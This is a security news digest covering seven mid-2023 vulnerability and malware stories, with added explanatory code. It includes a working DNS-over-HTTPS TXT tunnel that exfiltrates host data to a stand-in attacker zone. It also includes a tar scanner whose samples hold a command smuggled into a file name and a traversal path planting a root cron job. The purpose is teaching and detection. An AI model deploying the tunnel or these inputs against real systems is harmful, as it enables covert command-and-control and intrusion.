Programmer’s Digest #37
06/15/2023-06/21/2023 Vulnerabilities Reported in Microsoft Azure, New Linux Backdoor Utilizing DNS-over-HTTPS Tunneling, Critical Vulnerability in VMware’s Aria Operations for Networks And More
1. Severe Vulnerabilities Reported in Microsoft Azure Bastion and Container Registry
Two security vulnerabilities have been disclosed in Microsoft Azure Bastion and Azure Container Registry that could be exploited for cross-site scripting (XSS) attacks. An attacker could have gained access to a victim’s session inside the compromised Azure service’s iframe, leading to unauthorized data access, modifications, and disruption of Azure services. Both flaws stem from the postMessage mechanism the Azure portal uses to exchange data with the iframed service endpoints: the endpoints accepted messages from the framing page and rendered their contents, so malicious JavaScript could be injected through the embedded endpoint. To exploit them, an attacker first has to find a vulnerable endpoint that a third-party page can load in an iframe, that is, one served without an X-Frame-Options header or with a Content Security Policy (CSP) that lacks a restrictive frame-ancestors directive. By crafting a suitable payload and sending it to the endpoint’s postMessage handler, the attacker executes their code in the victim’s context. Orca Security demonstrated proof-of-concept exploits against both services, abusing the Topology View SVG exporter in Azure Bastion and the Quick Start page in Azure Container Registry to execute XSS payloads; Microsoft has since fixed both issues.
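The first step the article describes, finding an endpoint that a foreign page is allowed to frame, is a header check that can be automated. The following is an added example (not Orca’s tooling and not Azure’s code) that triages captured response headers for that precondition; the URLs and header sets at the bottom are constructed samples.

```python
"""Added example: triage HTTP response headers for the iframe precondition.
Not Orca's tooling, not Azure's code; sample responses below are constructed."""

OPEN_SOURCES = {"*", "http:", "https:"}   # frame-ancestors values that admit any site


def _header(headers, name):
    """Case-insensitive lookup; HTTP header names are case-insensitive.
    Note that 'Content-Security-Policy-Report-Only' deliberately does NOT
    match 'content-security-policy': a report-only policy enforces nothing."""
    for key, value in headers.items():
        if key.lower() == name:
            return value
    return None


def _frame_ancestors(csp):
    """Return the source list of the frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.strip("'").lower() for p in parts[1:]]
    return None


def framing_weakness(headers):
    """Explain why an arbitrary origin could frame this response, or return
    None when the headers prevent it."""
    csp = _header(headers, "content-security-policy") or ""
    sources = _frame_ancestors(csp)
    if sources is not None:
        # A present frame-ancestors directive overrides X-Frame-Options in
        # conforming browsers, so it decides the outcome by itself.
        if OPEN_SOURCES & set(sources):
            return "frame-ancestors admits any origin"
        return None
    xfo = (_header(headers, "x-frame-options") or "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return None
    if xfo.startswith("ALLOW-FROM"):
        return "ALLOW-FROM is obsolete and ignored by current browsers"
    if xfo:
        return f"unrecognised X-Frame-Options value {xfo!r}"
    return "no X-Frame-Options and no frame-ancestors"


def frameable_endpoints(responses):
    """Given [(url, headers)], return [(url, reason)] for every frameable one."""
    hits = []
    for url, headers in responses:
        reason = framing_weakness(headers)
        if reason:
            hits.append((url, reason))
    return hits


# Constructed sample responses (hypothetical hostnames and paths).
SAMPLE_RESPONSES = [
    ("https://svc.example.test/export/svg", {"Content-Type": "text/html"}),
    ("https://svc.example.test/quickstart", {"X-Frame-Options": "DENY"}),
    ("https://svc.example.test/topology",
     {"Content-Security-Policy": "default-src 'self'; frame-ancestors *"}),
    ("https://svc.example.test/settings",
     {"Content-Security-Policy": "frame-ancestors 'self' https://portal.example.test",
      "X-Frame-Options": "ALLOWALL"}),   # bad XFO value, but CSP wins here
    ("https://svc.example.test/legacy",
     {"X-Frame-Options": "ALLOW-FROM https://portal.example.test"}),
    ("https://svc.example.test/report",
     {"Content-Security-Policy-Report-Only": "frame-ancestors 'none'"}),
]

if __name__ == "__main__":
    for url, reason in frameable_endpoints(SAMPLE_RESPONSES):
        print(f"{url}: {reason}")
```

Framing is only the precondition. The bug itself lives in the iframed page’s message handler: one that reads `event.data` without comparing `event.origin` against an allow-list and then hands the data to an HTML sink (innerHTML, an SVG export, a template) is exploitable from any page that can frame it. The fix is both halves: forbid framing by unrelated origins with `frame-ancestors`, and make the handler reject messages from unexpected origins and treat their contents as data, passing it through a sanitizer such as DOMPurify when markup genuinely has to be rendered.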
2. Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits
Fraudulent GitHub accounts linked to a fake cybersecurity company are pushing malicious repositories that claim to be proof-of-concept exploits for zero-day vulnerabilities in Discord, Google Chrome, and Microsoft Exchange Server. VulnCheck, which discovered the activity, found that the perpetrators built a network of fake GitHub accounts and Twitter profiles to make the operation look legitimate, in some cases using photos of real security researchers from reputable firms such as Rapid7. The rogue repositories were first noticed in May, when similar fake exploits for Signal and WhatsApp were published; those repositories have since been taken down. The Python script that poses as the proof-of-concept simply downloads and executes a malicious binary on the victim’s operating system. Despite the effort invested in the false identities, the malware itself is easily detectable. Whether the attackers have succeeded is unclear, but their persistence suggests the approach is paying off. The practical lesson is to treat any PoC from an unverified source as untrusted code: read it before running it, and run it only in a disposable VM.
3. ChamelDoH: New Linux Backdoor Utilizing DNS-over-HTTPS Tunneling for Covert CnC
ChamelGang, a threat actor first exposed by Positive Technologies in September 2021, has been observed using a new Linux backdoor called ChamelDoH, a C++ implant that talks to its command-and-control (C2) infrastructure through DNS-over-HTTPS (DoH) tunneling. The 2021 report documented the group’s attacks on various industries across several countries, in which it exploited vulnerabilities in Microsoft Exchange Server and Red Hat JBoss Enterprise Application Platform and deployed a passive backdoor called DoorMe. Stairwell discovered the Linux backdoor, which collects system information and supports remote-access operations. ChamelDoH’s distinguishing feature is how it reaches its C2: it issues DNS TXT queries for attacker-controlled domains through public DoH resolvers such as Cloudflare’s and Google’s, which forward them to the actor’s rogue nameserver. Because the implant’s traffic is ordinary HTTPS to widely used resolvers, it cannot be blocked by IP or domain without also breaking legitimate DoH, and unlike plaintext DNS it cannot be inspected at the network boundary, which turns DoH into an effective encrypted C2 channel. Defenders who need visibility should force endpoints through a resolver they control (block known public DoH endpoints at egress and disable browser and OS DoH by policy) so that DNS queries are logged somewhere they can be analysed.
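To make the tunnel mechanics concrete, here is an added illustration of DNS TXT tunnelling through a public DoH resolver together with the query-name heuristic a defender can run over resolver logs. It is a generic design written for this digest to show how the channel works; it is not ChamelDoH’s wire format (Stairwell documents that), and the tunnel zone, session id and sample names are constructed.

```python
"""Added illustration of DNS TXT tunnelling over a public DoH resolver, plus a
query-name heuristic for spotting it. Generic design, not ChamelDoH's format;
the tunnel zone, session id and sample names are constructed."""
import base64
import math
from collections import Counter
from urllib.parse import urlencode

TUNNEL_ZONE = "cdn.example.test"                            # assumed attacker zone
DOH_JSON_ENDPOINT = "https://cloudflare-dns.com/dns-query"  # public resolver JSON API
MAX_LABEL, MAX_NAME = 63, 253                               # RFC 1035 limits
CHUNK = 60                                                  # payload bytes per query


def encode_query_name(session, seq, chunk, zone=TUNNEL_ZONE):
    """Implant side: pack one payload chunk into the QNAME of a TXT query.
    Base32 rather than base64 because DNS names are case-insensitive and
    resolvers may randomise case (0x20 encoding), which would corrupt base64."""
    b32 = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
    data_labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    name = ".".join([f"{session}-{seq}", *data_labels, zone])
    if len(name) > MAX_NAME:
        raise ValueError("query name exceeds 253 octets; use a smaller CHUNK")
    return name


def chunk_payload(session, data, zone=TUNNEL_ZONE):
    """Split an upload into the sequence of query names the implant would send."""
    return [encode_query_name(session, i, data[off:off + CHUNK], zone)
            for i, off in enumerate(range(0, len(data), CHUNK))]


def doh_json_request(name, endpoint=DOH_JSON_ENDPOINT):
    """What the implant actually sends: an HTTPS GET to a well-known resolver.
    A network sensor sees only TLS to that host, never the name or the TXT data."""
    url = f"{endpoint}?{urlencode({'name': name, 'type': 'TXT'})}"
    return url, {"accept": "application/dns-json"}


def decode_query_name(name, zone=TUNNEL_ZONE):
    """Rogue-nameserver side: recover (session, seq, chunk) from the QNAME that
    the public resolver forwarded to the zone's authoritative server."""
    if not name.lower().endswith("." + zone):
        raise ValueError("not a tunnel name")
    labels = name[:-len(zone) - 1].split(".")
    session, seq = labels[0].rsplit("-", 1)
    b32 = "".join(labels[1:]).upper()
    b32 += "=" * (-len(b32) % 8)                 # restore the stripped padding
    return session, int(seq), base64.b32decode(b32)


def encode_txt_response(command):
    """Rogue-nameserver side: tasking rides back in the TXT answer, split into
    the 255-octet character strings a TXT record is made of."""
    b64 = base64.b64encode(command).decode("ascii")
    return [b64[i:i + 255] for i in range(0, len(b64), 255)]


def decode_txt_response(strings):
    return base64.b64decode("".join(strings))


# --- detection side: run over names from your own resolver or DoH proxy logs ---
def shannon_entropy(s):
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def looks_like_tunnel(name):
    """Crude per-name heuristic: tunnels need long, dense labels. Pair it with
    per-zone query volume and the TXT-type ratio before alerting; CDN and
    anti-spam lookups produce occasional false positives on their own."""
    labels = name.rstrip(".").split(".")
    longest = max(labels, key=len)
    return (len(longest) >= 40
            or (len(longest) >= 20 and shannon_entropy(longest) >= 3.5)
            or len(name) >= 120)


if __name__ == "__main__":
    for qname in chunk_payload("a1b2", b"hostname=web01;uid=0;" * 4):
        url, headers = doh_json_request(qname)
        print(looks_like_tunnel(qname), url)
```

The detection half only works where the names are visible, which is exactly the point the article makes: with the implant talking to Cloudflare or Google over TLS, only the egress host is visible, so the heuristic has to run on a resolver you operate or on a proxy that terminates DoH.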
4. Third Flaw Uncovered in MOVEit Transfer App Amidst Cl0p Ransomware Mass Attack
Progress Software has disclosed a third vulnerability in its MOVEit Transfer application while the Cl0p cybercrime group extorts companies compromised through the first. Tracked as CVE-2023-35708, the new flaw is an SQL injection vulnerability that can lead to escalated privileges and unauthorized access. Until a fix is available, Progress advises customers to disable HTTP and HTTPS traffic to MOVEit Transfer on ports 80 and 443; SFTP and FTPS transfers, which use other ports, keep working in the meantime. The disclosure follows the earlier revelation of further SQL injection vulnerabilities (CVE-2023-35036) that granted unauthorized access to the application’s database. Cl0p has already exploited the first flaw, CVE-2023-34362, and has listed 27 victim organizations on its darknet leak portal, including US federal agencies. Censys reports that internet-exposed MOVEit servers are concentrated in the financial services, healthcare, IT, and government sectors in the US. Separately, Kaspersky reports that ransomware accounts for 58% of malware-as-a-service (MaaS) attacks, followed by information stealers (24%) and botnets, loaders, and backdoors (18%).
5. Alert! Hackers Exploiting Critical Vulnerability in VMware’s Aria Operations for Networks
VMware has warned that a critical command injection vulnerability in Aria Operations for Networks (formerly vRealize Network Insight), patched on June 7, 2023, is now being actively exploited. The flaw, tracked as CVE-2023-20887, lets an unauthenticated attacker with network access to the appliance obtain remote code execution through command injection. All 6.x releases of Aria Operations for Networks are affected. Although specific details of the attacks are unknown, VMware confirmed real-world exploitation, and threat intelligence firm GreyNoise observed exploitation attempts from two IP addresses in the Netherlands. The vulnerability was discovered by researcher Sina Kheirkhah, who published a proof-of-concept after the fix shipped. The speed with which newly disclosed vulnerabilities are weaponized remains a significant threat globally. Separately, Mandiant reported active exploitation of a VMware Tools flaw (CVE-2023-20867) by a suspected Chinese actor tracked as UNC3886, resulting in backdoored Windows and Linux guest hosts; that bug is a post-compromise issue, since it is only reachable from an ESXi host the attacker already controls.
6. Chinese UNC4841 Group Exploits Zero-Day Flaw in Barracuda Email Security Gateway
A threat actor tracked as UNC4841 has been exploiting a recently patched zero-day vulnerability in Barracuda Email Security Gateway (ESG) appliances since October 2022. The flaw, CVE-2023-2868, is a remote command injection bug affecting versions 5.1.3.001 through 9.2.0.006. Mandiant, brought in to investigate, describes UNC4841 as an aggressive and skilled espionage group. The actor sent targeted organizations emails carrying malicious TAR file attachments crafted to look like generic spam; when the appliance processed the attachment, the payload triggered a reverse shell on the ESG device, after which the actor deployed three malware families to establish persistence and execute arbitrary commands. UNC4841 then used the compromised appliances for lateral movement and data exfiltration. The campaign hit private and public sector organizations across 16 countries, with government entities making up almost a third of the victims. Barracuda’s guidance goes beyond patching: because the actor’s implants survive the fix, impacted appliances are to be replaced outright regardless of patch level, and credentials that passed through them should be rotated.
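Barracuda’s advisory traces CVE-2023-2868 to incomplete validation of the file names inside an attached .tar archive before they reached a command. The following is an added example of the gateway-side check that class of bug calls for, written for this digest rather than taken from Barracuda or from the actor’s tooling: it walks the archive’s members and flags names that carry shell metacharacters, path traversal or link tricks before any parser acts on them. The archive it scans is built in memory from constructed entries.

```python
"""Added example: scan a .tar attachment's member names for hostile content.
Illustration only, not Barracuda's code or the in-the-wild payload; the
archive below is constructed in memory."""
import io
import re
import tarfile

# Characters a legitimate member name never needs, and which turn into code the
# moment a name is interpolated into a shell command line.
SHELL_META = re.compile(r"[`$;|&<>(){}\\'\"\n\r]")


def suspicious_tar_members(blob):
    """Return [(member_name, [reasons])] for every entry worth quarantining.
    Only headers are read; member contents are never extracted."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:*") as tf:
        for member in tf.getmembers():
            reasons = []
            if SHELL_META.search(member.name):
                reasons.append("shell metacharacters in name")
            if member.name.startswith("/") or ".." in member.name.split("/"):
                reasons.append("absolute path or traversal")
            if member.issym() or member.islnk():
                reasons.append("link entry")   # can redirect a later write
            if reasons:
                findings.append((member.name, reasons))
    return findings


def scan_attachment(blob):
    """Policy hook for the mail pipeline: quarantine on any finding."""
    findings = suspicious_tar_members(blob)
    return ("quarantine" if findings else "deliver"), findings


def build_sample_tar():
    """Constructed archive: one benign member and two hostile names. The hostile
    names are illustrative and are not the actor's payload."""
    entries = [
        ("report.pdf", b"%PDF-1.4 sample"),
        ("invoice`id>/tmp/x`.txt", b""),
        ("../etc/cron.d/job", b"* * * * * root /tmp/x\n"),
    ]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, body in entries:
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tf.addfile(info, io.BytesIO(body))
    return buf.getvalue()


if __name__ == "__main__":
    verdict, findings = scan_attachment(build_sample_tar())
    print(verdict)
    for name, reasons in findings:
        print(f"  {name!r}: {', '.join(reasons)}")
```

A check like this belongs in front of the parser, not instead of fixing it: the real defect is a parser that passes a member name to a shell at all, and the durable fix is to never build a command line from archive metadata. The scan is still worth having because it gives the mail pipeline a quarantine decision and a log line for exactly the attachment shape this campaign used.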
7. Zyxel Releases Urgent Security Updates for Critical Vulnerability in NAS Devices
Zyxel has released security updates for a critical vulnerability in several of its network-attached storage (NAS) devices. Tracked as CVE-2023-27992, the flaw is a pre-authentication command injection bug: an unauthenticated attacker can execute arbitrary operating-system commands on an affected device by sending it a crafted HTTP request. The affected models are NAS326, NAS540, and NAS542; Zyxel has published fixed firmware for each. The alert follows the addition of two Zyxel firewall vulnerabilities, CVE-2023-33009 and CVE-2023-33010, to the U.S. Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities catalog. Given how actively Zyxel devices are being targeted, customers should apply the updates promptly and, because the bug needs no credentials, keep the NAS web interface off the public internet.